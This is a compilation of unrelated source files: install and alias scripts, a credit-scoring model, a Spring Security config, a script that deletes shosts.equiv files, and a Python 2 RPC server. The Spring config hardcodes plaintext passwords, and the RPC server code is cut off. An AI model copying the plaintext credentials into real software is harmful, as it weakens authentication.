apt-get -y install emacs24 emacs24-el emacs24-common-non-dfsg
|
#!/bin/sh
# Installer for the Waveshare JETANK add-on: installs the Python package and
# copies the tutorial notebook folders into the JetBot notebooks directory.
set -e
# NOTE(review): $1 is captured but never used below — presumably a leftover
# password parameter; confirm before removing.
password=$1
# install SCSservo pyserial imutils
apt update
python3 setup.py install
# NOTE(review): the '//workspace' double slash looks accidental but is
# harmless on POSIX paths.
cp -r JETANK_1_servos //workspace/jetbot/notebooks
cp -r JETANK_2_ctrl //workspace/jetbot/notebooks
cp -r JETANK_3_motionDetect //workspace/jetbot/notebooks
cp -r JETANK_4_colorRecognition //workspace/jetbot/notebooks
cp -r JETANK_5_colorTracking //workspace/jetbot/notebooks
cp -r JETANK_6_gamepadCtrl //workspace/jetbot/notebooks |
def sum_parameters(param1, param2):
    """Add (or concatenate) the two arguments and return the result as a string."""
    total = param1 + param2
    return str(total)
from pathlib import Path
import feast
import joblib
import pandas as pd
from sklearn import tree
from sklearn.exceptions import NotFittedError
from sklearn.preprocessing import OrdinalEncoder
from sklearn.utils.validation import check_is_fitted
class CreditScoringModel:
    """Decision-tree credit-scoring model backed by a Feast feature store.

    The fitted classifier and ordinal encoder are persisted to local files
    ("model.bin", "encoder.bin") and transparently reloaded on construction,
    so a process restart keeps a previously trained model.
    """

    # Columns that must be ordinal-encoded before reaching the classifier.
    categorical_features = [
        "person_home_ownership",
        "loan_intent",
        "city",
        "state",
        "location_type",
    ]

    # Feature references retrieved from Feast ("<feature view>:<feature>").
    feast_features = [
        "zipcode_features:city",
        "zipcode_features:state",
        "zipcode_features:location_type",
        "zipcode_features:tax_returns_filed",
        "zipcode_features:population",
        "zipcode_features:total_wages",
        "credit_history:credit_card_due",
        "credit_history:mortgage_due",
        "credit_history:student_loan_due",
        "credit_history:vehicle_loan_due",
        "credit_history:hard_pulls",
        "credit_history:missed_payments_2y",
        "credit_history:missed_payments_1y",
        "credit_history:missed_payments_6m",
        "credit_history:bankruptcies",
    ]

    # Label column in the training dataframe.
    target = "loan_status"
    # On-disk artifacts for the fitted classifier and encoder.
    model_filename = "model.bin"
    encoder_filename = "encoder.bin"

    def __init__(self):
        """Load persisted artifacts if present, else create fresh ones."""
        # Load model
        if Path(self.model_filename).exists():
            self.classifier = joblib.load(self.model_filename)
        else:
            self.classifier = tree.DecisionTreeClassifier()

        # Load ordinal encoder
        if Path(self.encoder_filename).exists():
            self.encoder = joblib.load(self.encoder_filename)
        else:
            self.encoder = OrdinalEncoder()

        # Set up feature store
        self.fs = feast.FeatureStore(repo_path="feature_repo")

    def train(self, loans):
        """Fit the classifier on `loans` (entity dataframe) and persist it.

        Columns are sorted before fitting so training and prediction use the
        same column order.
        """
        train_X, train_Y = self._get_training_features(loans)

        self.classifier.fit(train_X[sorted(train_X)], train_Y)
        joblib.dump(self.classifier, self.model_filename)

    def _get_training_features(self, loans):
        """Join historical Feast features onto `loans`; return (X, y).

        Also (re)fits the ordinal encoder on the categorical columns and
        applies it in place — so train() implicitly refreshes the encoder.
        """
        training_df = self.fs.get_historical_features(
            entity_df=loans, features=self.feast_features
        ).to_df()

        self._fit_ordinal_encoder(training_df)
        self._apply_ordinal_encoding(training_df)

        # Drop the label, Feast bookkeeping columns and raw entity keys.
        train_X = training_df[
            training_df.columns.drop(self.target)
            .drop("event_timestamp")
            .drop("created_timestamp")
            .drop("loan_id")
            .drop("zipcode")
            .drop("dob_ssn")
        ]
        train_X = train_X.reindex(sorted(train_X.columns), axis=1)
        train_Y = training_df.loc[:, self.target]

        return train_X, train_Y

    def _fit_ordinal_encoder(self, requests):
        """Fit the ordinal encoder on the categorical columns and persist it."""
        self.encoder.fit(requests[self.categorical_features])
        joblib.dump(self.encoder, self.encoder_filename)

    def _apply_ordinal_encoding(self, requests):
        """Encode the categorical columns of `requests` in place."""
        requests[self.categorical_features] = self.encoder.transform(
            requests[self.categorical_features]
        )

    def predict(self, request):
        """Score a single loan request; returns the predicted label.

        `request` is expected to be a dict of column -> single-element list
        (it must contain "zipcode" and "dob_ssn" entity keys) — presumably
        matching the training schema; confirm against the caller.
        """
        # Get online features from Feast
        feature_vector = self._get_online_features_from_feast(request)

        # Join features to request features
        features = request.copy()
        features.update(feature_vector)
        features_df = pd.DataFrame.from_dict(features)

        # Apply ordinal encoding to categorical features
        self._apply_ordinal_encoding(features_df)

        # Sort columns (must mirror the ordering used in train())
        features_df = features_df.reindex(sorted(features_df.columns), axis=1)

        # Drop unnecessary columns
        features_df = features_df[features_df.columns.drop("zipcode").drop("dob_ssn")]

        # Make prediction
        features_df["prediction"] = self.classifier.predict(features_df)

        # return result of credit scoring
        return features_df["prediction"].iloc[0]

    def _get_online_features_from_feast(self, request):
        """Fetch the online feature vector for the request's entity keys."""
        zipcode = request["zipcode"][0]
        dob_ssn = request["dob_ssn"][0]

        return self.fs.get_online_features(
            entity_rows=[{"zipcode": zipcode, "dob_ssn": dob_ssn}],
            features=self.feast_features,
        ).to_dict()

    def is_model_trained(self):
        """Return True if the decision tree has been fitted."""
        try:
            check_is_fitted(self.classifier, "tree_")
        except NotFittedError:
            return False
        return True
|
package com.demo.config;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.ComponentScan;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.authentication.AuthenticationManager;
import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;
import org.springframework.security.config.annotation.web.HttpSecurityBuilder;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
import org.springframework.security.core.userdetails.User;
import org.springframework.security.core.userdetails.UserDetailsService;
import org.springframework.security.provisioning.InMemoryUserDetailsManager;
import org.springframework.security.web.authentication.www.BasicAuthenticationFilter;
import org.springframework.security.web.authentication.www.DigestAuthenticationFilter;
/**
 * Spring Security configuration: in-memory users, digest authentication via a
 * custom entry point/filter, HTTPS enforced on every request, and a permitted
 * form-login page.
 *
 * NOTE(review): WebSecurityConfigurerAdapter is deprecated in Spring Security
 * 5.7+ (component-based SecurityFilterChain beans are preferred) — confirm the
 * framework version before migrating.
 *
 * @author ankidaemon
 *
 */
@Configuration
@EnableWebSecurity
@ComponentScan(basePackages = "com.demo.config")
public class SecurityConfig extends WebSecurityConfigurerAdapter {
    /* @Autowired
    public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {
        auth.inMemoryAuthentication().withUser("ankidaemon").password("password").roles("USER").and().withUser("test")
                .password("<PASSWORD>").roles("USER");
    }*/

    /**
     * In-memory user store with two USER-role accounts.
     * NOTE(review): passwords are stored in plain text with no password-encoder
     * id prefix (e.g. "{noop}"); digest auth needs plaintext, but under the
     * default DelegatingPasswordEncoder this may fail at runtime — confirm.
     * "<PASSWORD>" looks like a redaction placeholder, not a real credential.
     */
    @Bean
    public UserDetailsService userDetailsService() {
        InMemoryUserDetailsManager manager = new InMemoryUserDetailsManager();
        manager.createUser(User.withUsername("ankidaemon").password("password").roles("USER").build());
        manager.createUser(User.withUsername("test").password("<PASSWORD>").roles("USER").build());
        return manager;
    }

    // Entry points that issue the Basic/Digest authentication challenges.
    @Autowired
    private CustomBasicAuthenticationEntryPoint customBasicAuthenticationEntryPoint;
    @Autowired
    private CustomDigestAuthenticationEntryPoint customDigestAuthenticationEntryPoint;

    /**
     * Authorization rules: /chief/** requires ROLE_USER; /agent/** requires
     * ROLE_AGENT plus a principal-name check; everything else just requires
     * authentication. All traffic is forced to HTTPS, and the digest filter
     * handles the challenge/response.
     */
    @Override
    protected void configure(HttpSecurity http) throws Exception {
        http.authorizeRequests().regexMatchers("/chief/.*").hasRole("USER")
                .regexMatchers("/agent/.*").access("hasRole('AGENT') and principal.name='<NAME>'").anyRequest()
                .authenticated()
                //.and().httpBasic().authenticationEntryPoint(customBasicAuthenticationEntryPoint)
                .and().exceptionHandling().authenticationEntryPoint(customDigestAuthenticationEntryPoint)
                .and().requiresChannel().anyRequest().requiresSecure()
                //.and().addFilter(basicAuthenticationFilter(super.authenticationManagerBean()));
                .and().addFilter(digestAuthenticationFilter());
        http.formLogin().loginPage("/login").permitAll();
    }

    /** Builds the digest filter wired to the custom entry point and user store. */
    public DigestAuthenticationFilter digestAuthenticationFilter() {
        DigestAuthenticationFilter digestAuthenticationFilter = new DigestAuthenticationFilter();
        digestAuthenticationFilter.setAuthenticationEntryPoint(customDigestAuthenticationEntryPoint);
        digestAuthenticationFilter.setUserDetailsService(userDetailsService());
        return digestAuthenticationFilter;
    }

    /** Alternative Basic-auth filter (currently unused; see commented wiring above). */
    public BasicAuthenticationFilter basicAuthenticationFilter(AuthenticationManager authManager) throws Exception {
        BasicAuthenticationFilter basicAuthenticationFilter = new BasicAuthenticationFilter(authManager,
                customBasicAuthenticationEntryPoint);
        return basicAuthenticationFilter;
    }
}
|
9.2
|
# Identify local mount points.
# Bug fix: skip df's header row (NR > 1) — previously the header token
# "Mounted" was fed to find as a path, producing a spurious error.
MOUNT_LIST=$(df --local | awk 'NR > 1 { print $6 }')
# Delete every shosts.equiv file on each local mount without crossing into
# other filesystems (-xdev).
# NOTE(review): mount points containing whitespace would still split — assumed
# not to occur here; confirm if exotic mounts are possible.
for cur_mount in ${MOUNT_LIST}
do
    find "${cur_mount}" -xdev -type f -name "shosts.equiv" -exec rm -f {} \;
done
|
/*
 * Toggle display of loaders / disable buttons
 * -------------------------------------------
 *
 * Loaders have their `data-hide` attribute removed when shown and (re)added
 * when hidden; buttons are disabled while the loaders are visible, with
 * `aria-disabled` kept in sync for assistive technology.
 *
 * @param loaders [array] of [HTMLElement]
 * @param buttons [array] of [HTMLElement]
 * @param show [boolean]
 */
export const setLoaders = ( loaders = [], buttons = [], show = true ) => {
    for ( const loader of loaders ) {
        if ( show ) {
            loader.removeAttribute( 'data-hide' );
        } else {
            loader.setAttribute( 'data-hide', '' );
        }
    }

    for ( const button of buttons ) {
        button.disabled = show;
        button.setAttribute( 'aria-disabled', show.toString() );
    }
};
|
<reponame>orlouge/amphitrite-casket
package io.github.orlouge.amphitritecoffer.mixin;
import io.github.orlouge.amphitritecoffer.config.AmphitriteCofferConfig;
import net.minecraft.block.BlockState;
import net.minecraft.block.Blocks;
import net.minecraft.block.entity.LootableContainerBlockEntity;
import net.minecraft.structure.OceanMonumentGenerator;
import net.minecraft.structure.StructurePiece;
import net.minecraft.structure.StructurePieceType;
import net.minecraft.util.Identifier;
import net.minecraft.util.math.BlockBox;
import net.minecraft.util.math.BlockPos;
import net.minecraft.world.StructureWorldAccess;
import net.minecraft.world.gen.StructureAccessor;
import net.minecraft.world.gen.chunk.ChunkGenerator;
import org.spongepowered.asm.mixin.Mixin;
import org.spongepowered.asm.mixin.injection.At;
import org.spongepowered.asm.mixin.injection.Redirect;
import java.util.Random;
import static net.minecraft.state.property.Properties.WATERLOGGED;
import io.github.orlouge.amphitritecoffer.AmphitriteCofferMod;
// Mixin into the ocean-monument core-room generator: replaces the vanilla
// treasure pillar's top layer with waterlogged amphitrite coffers carrying loot.
@Mixin(OceanMonumentGenerator.CoreRoom.class)
public abstract class CoreRoomMixin extends StructurePiece {
    // Coffer state pre-set to WATERLOGGED=true since the monument interior is flooded.
    private static final BlockState WATERLOGGED_COFFER = AmphitriteCofferMod.AMPHITRITE_COFFER_BLOCK.getDefaultState().with(WATERLOGGED, true);

    // Required by the StructurePiece superclass; never instantiated via the mixin itself.
    protected CoreRoomMixin(StructurePieceType type, int length, BlockBox boundingBox) {
        super(type, length, boundingBox);
    }

    // Redirects one specific fillWithOutline call (ordinal 12) inside
    // CoreRoom.generate so the redirected fill can be customised.
    @Redirect(method = "generate(Lnet/minecraft/world/StructureWorldAccess;Lnet/minecraft/world/gen/StructureAccessor;Lnet/minecraft/world/gen/chunk/ChunkGenerator;Ljava/util/Random;Lnet/minecraft/util/math/BlockBox;Lnet/minecraft/util/math/ChunkPos;Lnet/minecraft/util/math/BlockPos;)V",
            at = @At(value = "INVOKE", target = "Lnet/minecraft/structure/OceanMonumentGenerator$CoreRoom;fillWithOutline(Lnet/minecraft/world/StructureWorldAccess;Lnet/minecraft/util/math/BlockBox;IIIIIILnet/minecraft/block/BlockState;Lnet/minecraft/block/BlockState;Z)V", ordinal = 12)
    )
    public void fillCoreRoomTreasure(OceanMonumentGenerator.CoreRoom coreRoom, StructureWorldAccess world, BlockBox box, int minX, int minY, int minZ, int maxX, int maxY, int maxZ, BlockState out, BlockState in, boolean canReplaceAir, StructureWorldAccess world2, StructureAccessor structureAccessor, ChunkGenerator chunkGenerator, Random random) {
        // Config escape hatch: keep the vanilla fill untouched.
        if (AmphitriteCofferMod.CONFIG.disableMonumentGeneration) {
            this.fillWithOutline(world, box, minX, minY, minZ, maxX, maxY, maxZ, out, in, canReplaceAir);
            return;
        }
        // Lower layers keep the vanilla blocks; the top layer becomes coffers.
        this.fillWithOutline(world, box, minX, minY, minZ, maxX, maxY - 1, maxZ, out, in, canReplaceAir);
        this.fillWithOutline(world, box, minX, minY + 1, minZ, maxX, maxY, maxZ, WATERLOGGED_COFFER, WATERLOGGED_COFFER, canReplaceAir);
        // Pick two distinct slots for the special loot tables.
        // NOTE(review): treasurePosition/treasurePosition2 take values 0..3, but
        // lootRotation below takes values 1..4, so a draw of 0 can never match and
        // silently falls through to the generic table — confirm this is intended.
        int treasurePosition = random.nextInt(4), treasurePosition2 = (treasurePosition + random.nextInt(3) + 1) % 4;
        int lootRotation = 0;
        // The 2x2 coffer grid at the pillar top; each cell gets a loot table.
        for (int x = minX; x < minX + 2; x++) {
            for (int z = minZ; z < minZ + 2; z++) {
                lootRotation++;
                Identifier lootTable;
                if (treasurePosition == lootRotation) {
                    lootTable = AmphitriteCofferMod.MONUMENT_CORE_LOOT_HEART;
                } else if (treasurePosition2 == lootRotation) {
                    lootTable = AmphitriteCofferMod.MONUMENT_CORE_LOOT_TREASURE;
                } else {
                    lootTable = AmphitriteCofferMod.MONUMENT_CORE_LOOT_GENERIC;
                }
                // apply*Transform maps local room coordinates to world coordinates.
                LootableContainerBlockEntity.setLootTable(
                        world,
                        random,
                        new BlockPos(this.applyXTransform(x, z), this.applyYTransform(minY + 1), this.applyZTransform(x, z)),
                        lootTable
                );
            }
        }
    }
}
|
// ESLint configuration.
// Numeric severity codes understood by ESLint (ERROR is kept for completeness
// even though no rule currently uses it).
const OFF = 0, WARN = 1, ERROR = 2;
module.exports = exports = {
    // Environments whose globals are predefined for the linter.
    "env": {
        "browser" : true,
        "node" : true,
        "es6": true,
        "jquery": true
    },
    "ecmaFeatures": {
        "modules": true
    },
    // Base rule sets; "google" is the Google style guide preset.
    "extends": ["eslint:recommended", "google"],
    // Project-specific overrides of the presets above.
    "rules": {
        "no-console": WARN,
        "no-undef": WARN,
        "no-unused-vars": WARN,
        "object-curly-spacing": OFF,
        "no-multiple-empty-lines": OFF,
        "arrow-parens": OFF,
        "require-jsdoc": OFF,
        "brace-style": OFF,
        "padded-blocks": OFF,
        "max-len": WARN,
    },
    // ecmaVersion 8 == ES2017 (async/await); source files are ES modules.
    "parserOptions": {
        "ecmaVersion": 8,
        "sourceType": "module"
    }
};
|
#!/usr/bin/env bash
# Bind the conda-managed Python and Jupyter to PySpark by appending to the
# cluster's spark-env.sh. $1: IP address the notebook server should listen on.
# bind conda to spark
echo -e "\nexport PYSPARK_PYTHON=/home/hadoop/conda/bin/python" >> /etc/spark/conf/spark-env.sh
echo "export PYSPARK_DRIVER_PYTHON=/home/hadoop/conda/bin/jupyter" >> /etc/spark/conf/spark-env.sh
# Single quotes are inside a double-quoted string, so $1 still expands here.
echo "export PYSPARK_DRIVER_PYTHON_OPTS='notebook --no-browser --ip=$1'" >> /etc/spark/conf/spark-env.sh
|
<reponame>AliFrank608-TMW/RacingReact<filename>src/reducers/horse/index.js
import horseReducer from './horseReducer'
import { combineReducers } from 'redux'
// Root reducer for the horse domain: exposes horseReducer under `horseInfo`.
export default combineReducers({
    horseInfo: horseReducer,
})
|
#!/bin/sh
# Shell alias definitions for an interactive session.
# Prefer lsd for listings when available, otherwise fall back to GNU ls/tree.
if command -v lsd > /dev/null; then
    alias ls='lsd -F --icon=never --date=relative'
    alias l='ls -l'
    alias lr='l --tree'
    alias ll='l -a'
    alias llr='ll --tree'
else
    alias ls='ls -Fh --color=auto'
    alias l='ls -l'
    alias lr='tree'
    alias ll='l -A'
    alias llr='tree -a'
fi
alias bat='bat --tabs=4'
# '--' lets the alias name start with a dash; jumps to the previous directory.
alias -- -='cd -'
# Safety nets: prompt before bulk removal / overwriting.
alias rm='rm -I'
alias cp='cp -i'
alias mv='mv -i'
alias mkdir='mkdir -p'
alias grep='grep --color'
alias greppy='grep -C 3'
# Human-readable disk usage.
alias du='du -h'
alias df="df -kTh"
alias re='grep -E'
alias less='bat'
# Kitty terminal inline image viewer.
alias ccat='kitty +kitten icat'
# X clipboard: set (scb) and get (gcb).
alias scb="xclip -selection c"
alias gcb="xclip -selection c -o"
alias edit='micro'
alias c='clear'
alias b='bat'
alias e='edit'
alias v='nvim'
# Monitoring shortcuts.
alias iomon='sudo iotop'
alias sysm='bpytop'
alias ctl='systemctl'
alias uctl='systemctl --user'
# Docker managed through sudo rather than the docker group.
alias docker-start='sudo systemctl start docker.service'
alias docker-stop='sudo systemctl stop docker.service'
alias docker='sudo docker'
alias docker-compose='sudo docker-compose'
|
#!/bin/bash
# Run the policy training/evaluation pipeline for one relation.
# $1: relation name, forwarded to each stage.
relation=$1
# Stage 1: supervised pre-training of the policy.
python2 sl_policy.py $relation
# Stage 2: reinforcement-learning retraining of the agent.
python2 policy_agent.py $relation retrain
# Stage 3: evaluation on the test split.
python2 policy_agent.py $relation test
|
'use strict';
const {Tray, Menu} = require('electron');
const path = require('path');
/**
* 托盘模块
*/
module.exports = {
/**
* 安装
*/
install (eeApp) {
eeApp.logger.info('[preload] load tray module');
const trayConfig = eeApp.config.tray;
const mainWindow = eeApp.electron.mainWindow;
// 托盘图标
let iconPath = path.join(eeApp.config.homeDir, trayConfig.icon);
// 托盘菜单功能列表
let trayMenuTemplate = [
{
label: '显示',
click: function () {
mainWindow.show();
}
},
{
label: '退出',
click: function () {
eeApp.appQuit();
}
}
]
// 点击关闭,最小化到托盘
mainWindow.on('close', (event) => {
mainWindow.hide();
mainWindow.setSkipTaskbar(true);
event.preventDefault();
});
mainWindow.show();
// 测试发现:创建的Tray对象实例变量和app.whenReady()在同一模块中定义才行
// 赋值给eeApp.electron.tray,已在框架ee-core包中定义
// 如果赋值给其它变量,可能出现异常,估计是electron的bug
eeApp.electron.tray = new Tray(iconPath);
let appTray = eeApp.electron.tray;
appTray.setToolTip(trayConfig.title); // 托盘标题
const contextMenu = Menu.buildFromTemplate(trayMenuTemplate);
appTray.setContextMenu(contextMenu);
// 监听 显示/隐藏
appTray.on('click', function(){
if (mainWindow.isVisible()) {
mainWindow.hide();
mainWindow.setSkipTaskbar(false);
} else {
mainWindow.show();
mainWindow.setSkipTaskbar(true);
}
});
}
}
|
// Minimal static server for the angular-offline example/test pages.
var path = require('path');
var express = require('express');

var app = express();

// Serve this directory plus the built library artifacts one level up.
app.use(express.static(__dirname));
app.use('/angular-offline.js', express.static(path.join(__dirname, '../angular-offline.js')));
app.use('/angular-offline.min.js', express.static(path.join(__dirname, '../angular-offline.min.js')));
app.use('/angular-offline.min.js.map', express.static(path.join(__dirname, '../angular-offline.min.js.map')));
app.use('/bower_components', express.static(path.join(__dirname, '../bower_components')));

// Tiny JSON endpoints used by the tests.
app.get('/test.json', function (req, res) {
    res.send({foo: 'bar'});
});
app.post('/test.json', function (req, res) {
    res.send({foo: 'bar'});
});

// Bug fix: the startup message always printed port 3000 even when the PORT
// environment variable selected a different one; log the port actually used.
var port = process.env.PORT || 3000;
app.listen(port);
console.log('Server is listening, http://localhost:' + port + '/');
|
import requests
import logging
logger = logging.getLogger(__name__)
class MonzoClientError(Exception):
    """Raised when a request to the Monzo API fails.

    The previous pass-through ``__init__`` added nothing over the inherited
    ``Exception.__init__`` and has been removed; construction behaviour is
    unchanged.
    """
class MonzoClient:
    """Thin wrapper around the Monzo REST API for a single access token."""

    def __init__(self, access_token):
        # Bearer token used to authenticate every request.
        self.access_token = access_token

    def get_account_balance(self):
        """Return the current account balance from /balance.

        Raises MonzoClientError if the HTTP request fails.
        """
        try:
            response = requests.get(
                'https://api.monzo.com/balance',
                headers={'Authorization': f'Bearer {self.access_token}'},
            )
            response.raise_for_status()  # Raise an error for non-2xx status codes
            return response.json()['balance']
        except requests.RequestException as exc:
            logger.error(f"Failed to retrieve account balance: {exc}")
            raise MonzoClientError("Failed to retrieve account balance")

    def get_transaction_history(self, since=None):
        """Return the transaction list from /transactions.

        since: optional lower bound forwarded as a query parameter.
        Raises MonzoClientError if the HTTP request fails.
        """
        try:
            query = {'since': since} if since else {}
            response = requests.get(
                'https://api.monzo.com/transactions',
                headers={'Authorization': f'Bearer {self.access_token}'},
                params=query,
            )
            response.raise_for_status()  # Raise an error for non-2xx status codes
            return response.json()['transactions']
        except requests.RequestException as exc:
            logger.error(f"Failed to retrieve transaction history: {exc}")
            raise MonzoClientError("Failed to retrieve transaction history")
<filename>node_modules/@angular-eslint/eslint-plugin-template/dist/processors.d.ts
/**
 * Because ultimately a user is in control of how and when this processor gets invoked,
 * we can't fully protect them against doing more work than is necessary in all cases.
 *
 * Therefore, before we do a full parse of a TypeScript file to try and extract one or
 * more Component declarations we want to do a really quick check for whether or not
 * a file is likely to contain them.
 */
export declare function isFileLikelyToContainComponentDeclarations(text: string, filename: string): boolean;
/**
 * Result of preprocessing: the original source plus one virtual file
 * per extracted inline template.
 */
declare type PreprocessResult = (string | {
    text: string;
    filename: string;
})[];
/** Split a component file into the source itself and its inline HTML templates. */
export declare function preprocessComponentFile(text: string, filename: string): PreprocessResult;
/**
 * Merge the lint messages produced for each virtual file back into a single
 * flat list for the original file.
 */
export declare function postprocessComponentFile(multiDimensionalMessages: {
    ruleId: string;
    severity: number;
    message: string;
    line: number;
    column: number;
    nodeType: string;
    messageId: string;
    endLine: number;
    endColumn: number;
    fix?: {
        range: number[];
        text: string;
    };
}[][], _filename: string): readonly unknown[];
/** The 'extract-inline-html' processor as registered with ESLint. */
declare const _default: {
    'extract-inline-html': {
        preprocess: typeof preprocessComponentFile;
        postprocess: typeof postprocessComponentFile;
        supportsAutofix: boolean;
    };
};
export default _default;
<reponame>vchoudhari45/codingcargo<gh_stars>1-10
package com.vc.easy
object L541 {
  /**
   * LeetCode 541: for every window of 2k characters, reverse the first k
   * characters (or all remaining characters if fewer than k are left).
   */
  def reverseStr(s: String, k: Int): String = {
    val chars = s.toCharArray
    val len = chars.length

    var windowStart = 0
    while (windowStart < len) {
      // In-place reversal of chars(windowStart .. min(windowStart+k-1, len-1)).
      var lo = windowStart
      var hi = math.min(windowStart + k - 1, len - 1)
      while (lo < hi) {
        val tmp = chars(lo)
        chars(lo) = chars(hi)
        chars(hi) = tmp
        lo += 1
        hi -= 1
      }
      windowStart += 2 * k
    }
    new String(chars)
  }
}
|
<filename>giveMeHandFrond-end/src/app/chart/chart.component.ts
import { Component, OnInit } from '@angular/core';
import { ChartDataSets, ChartOptions, ChartType } from 'chart.js';
import { Color, Label, MultiDataSet } from 'ng2-charts';
import { DemandeService } from '../services/demande-service';
import { OffreServiceService } from '../services/offre-service.service';
@Component({
  selector: 'app-chart',
  templateUrl: './chart.component.html',
  styleUrls: ['./chart.component.scss']
})
/**
 * Dashboard component rendering three charts:
 *  - a bar chart of offers per category,
 *  - a bar chart of requests per category,
 *  - a doughnut of request statuses (pending / accepted / refused).
 */
export class ChartComponent implements OnInit {
  // Shared category labels for both bar charts; filled from the service.
  barChartLabels: Label[] = [];
  barChartType: ChartType = 'bar';
  barChartLegend = true;
  barChartPlugins = [];
  offres: any;
  categories: any;
  // NOTE(review): 'villes' is never assigned or read in this component.
  villes: any;
  barChartData: ChartDataSets[];
  barChartDataDemandes: ChartDataSets[];
  colors = [{borderColor: 'black',backgroundColor: [
    "#E7930F",
    "#FFFCFC",
    "#D4B584 "
  ]}];
  doughnutChartLabels: Label[] = ['En attente', 'Acceptée', 'Refusée'];
  doughnutChartData: MultiDataSet = [];
  doughnutChartType: ChartType = 'doughnut';
  constructor(private offreService: OffreServiceService,private demandeService: DemandeService){
  }
  lbarChartOptions: ChartOptions = {
    responsive: true,
  };
  ngOnInit(): void {
    this.refreshData();
  }
  // Rebuild every dataset from the offer/request services.
  // NOTE(review): the chart datasets are assigned synchronously but filled
  // inside async subscribe callbacks; this works only because the same array
  // references ('data', 'data2') are mutated later — confirm the services
  // emit before change detection renders the charts.
  refreshData() {
    var data = [];   // offer count per category label
    var data2 = [];  // request count per category label
    this.offres = this.offreService.getOffreList();
    this.categories = this.offreService.getCategories();
    this.categories.subscribe((value) => {
      if(value.length == 0) {
        console.log("aucune catégorie");
      }
      else{
        // i starts at 1, so value[0] is skipped — presumably a placeholder
        // entry in the service response; TODO confirm.
        var i = 1;
        console.log(value.length);
        value.forEach(element =>{
          if(i<value.length){
            this.barChartLabels.push(value[i]);
            data.push(0);
            data2.push(0);
          }
          i++;
        });
      }
    });
    // NOTE(review): 'nbCat' is computed before the subscription above has
    // necessarily run, and is never used afterwards.
    var nbCat = this.barChartLabels.length;
    this.offres.subscribe((value) => {
      if(value.length == 0) {
        console.log("aucune offre");
      }
      else{
        // Tally each offer under its category's index.
        value.forEach(element => {
          var cat = element.categorie;
          var j = this.barChartLabels.indexOf(cat);
          data[j] =data[j]+1;
        });
      }});
    this.barChartData = [{ data: data, label: 'Offres/Catégories',backgroundColor:'rgba(229, 152, 102)' }];
    // Status counters: [pending, accepted, refused].
    var nbOffres= [0,0,0];
    var demandes = this.demandeService.getAllDemandes();
    demandes.subscribe((value) =>{
      if(value.length == 0) {
        console.log("aucune demande");
        //this.barChartDataDemandes = [{ data: data2, label: 'Demandes/Catégorie',backgroundColor:'rgba(243, 156, 18 )' }];
      }
      else{
        value.forEach(element => {
          var status = element.statut;
          var cat = element.offre.categorie;
          var j = this.barChartLabels.indexOf(cat);
          data2[j] =data2[j]+1;
          if(status=="ATTENTE"){
            nbOffres[0] = nbOffres[0]+1;
          }
          else if(status == "ACCEPTE"){
            nbOffres[1] = nbOffres[1]+1;
          }
          else{
            nbOffres[2] = nbOffres[2]+1;
          }
        });
      }
      console.log(data2);
      this.barChartDataDemandes = [{ data: data2, label: 'Demandes/Catégorie',backgroundColor:'rgba(243, 156, 18 )' }];
      this.doughnutChartData= [nbOffres];
    });
  }
}
|
#!/bin/sh
# Remove the /ping marker directory/file from the filesystem.
# NOTE(review): presumably a container health/liveness marker — confirm the
# absolute root-level path is intended before running on a host.
rm -rf /ping
|
# encoding:utf-8
import os
import sys
import math
import json
import errno
import struct
import signal
import socket
import asyncore
from cStringIO import StringIO
from kazoo.client import KazooClient
import Request_pb2
class RPCServer(asyncore.dispatcher):
    """Preforking TCP RPC server (Python 2 / asyncore) registered in ZooKeeper."""

    # ZooKeeper paths under which service endpoints are registered.
    zk_root = "/demo"
    zk_rpc = zk_root + "/rpc"
    zk_rpc1 = zk_root + "/rpc1"

    def __init__(self,host,port):
        """Listen on (host, port), fork workers, and register the parent in ZK."""
        asyncore.dispatcher.__init__(self)
        self.host = host
        self.port = port
        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        self.set_reuse_addr()
        self.bind((host,port))
        self.listen(1)
        self.child_pids = []
        if self.prefork(3):
            self.register_zk() # register the service (parent only)
            self.register_parent_signal() # parent-process cleanup handlers
        else:
            self.register_child_signal() # child-process cleanup handlers
        for pid in self.child_pids:
            print pid

    # Fork n worker processes; returns True in the parent, False in a child.
    def prefork(self,n):
        for i in range(n):
            pid = os.fork()
            if pid < 0:
                raise
            if pid > 0: # parent process
                self.child_pids.append(pid) # remember the child's pid
                continue
            if pid == 0: # child process
                return False
        return True

    def register_zk(self):
        """Publish this endpoint as an ephemeral, sequenced ZooKeeper node."""
        print "start register zk..."
        self.zk = KazooClient(hosts = "172.16.17.32:3181")
        self.zk.start()
        self.zk.ensure_path(self.zk_root)
        value = json.dumps({"host":self.host,"port":self.port})
        # create the service child node
        self.zk.create(self.zk_rpc,value,ephemeral=True, sequence=True)
        value_1 = json.dumps({"host":"172.16.17.32","port":8082})
        # create a second service child node (disabled)
        # self.zk.create(self.zk_rpc1,value_1,ephemeral=True, sequence=True)
        print "zk localhost 3181"

    def exit_parent(self,sig,frame):
        # SIGINT/SIGTERM handler for the parent; currently only logs.
        print "exit_parent"

    def reap_child(self,sig,frame):
        """SIGCHLD handler: reap one terminated child without blocking."""
        print "before reap_child"
        while True:
            try:
                info = os.waitpid(-1,os.WNOHANG)
                break
            except OSError,ex:
                if ex.args[0] == errno.ECHILD:
                    return # no children left to reap
                if ex.args[0] != errno.EINTR:
                    raise ex
        pid = info[0]
        try:
            self.child_pids.remove(pid)
        except ValueError:
            pass
        print "reap_child pid:",pid

    def exit_child(self,sig,frame):
        # SIGINT/SIGTERM handler for workers: shut down all sockets.
        self.close() # close the server socket
        asyncore.close_all() # close all client sockets
        print "exit_child all_closed"

    def register_parent_signal(self):
        signal.signal(signal.SIGINT,self.exit_parent)
        signal.signal(signal.SIGTERM,self.exit_parent)
        signal.signal(signal.SIGCHLD,self.reap_child) # -9 -2

    def register_child_signal(self):
        signal.signal(signal.SIGINT, self.exit_child)
        signal.signal(signal.SIGTERM, self.exit_child)

    def handle_accept(self):
        # Accept an incoming connection and hand it to an RPCHandler.
        pair = self.accept()
        if pair is not None:
            sock,addr = pair
            print sock,pair
            print "handle_accept"
            RPCHandler(sock,addr)
